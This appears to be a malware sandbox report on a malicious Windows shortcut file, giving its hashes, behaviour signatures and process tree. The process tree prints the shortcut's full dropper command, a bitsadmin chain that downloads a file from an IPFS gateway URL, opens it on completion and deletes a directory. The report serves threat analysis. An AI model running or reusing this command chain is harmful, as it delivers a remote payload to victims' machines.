Overview

overview

7

Static

static

1

fb922c41d0...cs.lnk

windows7-x64

6

fb922c41d0...cs.lnk

windows10-2004-x64

7

Analysis

  • max time kernel
    118s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240419-en
  • resource tags

    arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system
  • submitted
    23/05/2024, 09:55

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    fb922c41d0db830efa2e420e37ec5aa0_NeikiAnalytics.lnk

  • Size

    4KB

  • MD5

    fb922c41d0db830efa2e420e37ec5aa0

  • SHA1

    450a7921db348d9731b1e34c31e04f140ace36f4

  • SHA256

    49d2124dfc3dca1c6a982ec8d2ff4a5d2c61a9a245f6f4c55ae087a7408445c9

  • SHA512

    5c7935f6b65b68c47f65b14d12252b49ce794274134c3c377fd9cf7fa2cbeb98eee582bd6078c9468609b45e65a054f4b093bc782d1ec816960e234c8d564c13

  • SSDEEP

    48:8w/xDdYAhvw7QSZQ+NIlZAsQ0fZncRrLZSZoab6Nv:8wZDzokyVrZ0fu9ZSiH

Score
6/10

Malware Config

Signatures

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Download via BitsAdmin 1 TTPs 1 IoCs
    dropper
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\fb922c41d0db830efa2e420e37ec5aa0_NeikiAnalytics.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1008
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c "bitsadmin /reset&bitsadmin /create ""&bitsadmin /addfile "" "https://cloudflare-ipfs.com/ipfs/bafybeigazjlfqpg24molg3u7joq3fsyrgdk7bctuirjrojt5wbx6o4o2da?www=" "C:\Users\Admin\AppData\Local\Temp\tmpfile.html"&bitsadmin /setproxysettings "" NO_PROXY&bitsadmin /setnotifyflags "" 1&bitsadmin /setnotifycmdline "" "C:\Windows\system32\cmd.exe" "/c bitsadmin /complete \"\"&start \"\" \"C:\Users\Admin\AppData\Local\Temp\tmpfile.html\""&bitsadmin /resume ""&if "%cd%"=="%cd:system32=%" (rd /s /q "%cd%\dir1\dir2")"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2740
      • C:\Windows\system32\bitsadmin.exe
        bitsadmin /reset
        3⤵
          PID:2176
        • C:\Windows\system32\bitsadmin.exe
          bitsadmin /create ""
          3⤵
            PID:2736
          • C:\Windows\system32\bitsadmin.exe
            bitsadmin /addfile "" "https://cloudflare-ipfs.com/ipfs/bafybeigazjlfqpg24molg3u7joq3fsyrgdk7bctuirjrojt5wbx6o4o2da?www=" "C:\Users\Admin\AppData\Local\Temp\tmpfile.html"
            3⤵
            • Download via BitsAdmin
            PID:2828
          • C:\Windows\system32\bitsadmin.exe
            bitsadmin /setproxysettings "" NO_PROXY
            3⤵
              PID:2512
            • C:\Windows\system32\bitsadmin.exe
              bitsadmin /setnotifyflags "" 1
              3⤵
                PID:2480
              • C:\Windows\system32\bitsadmin.exe
                bitsadmin /setnotifycmdline "" "C:\Windows\system32\cmd.exe" "/c bitsadmin /complete \"\"&start \"\" \"C:\Users\Admin\AppData\Local\Temp\tmpfile.html\""
                3⤵
                  PID:2380
                • C:\Windows\system32\bitsadmin.exe
                  bitsadmin /resume ""
                  3⤵
                    PID:2288

              Network

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads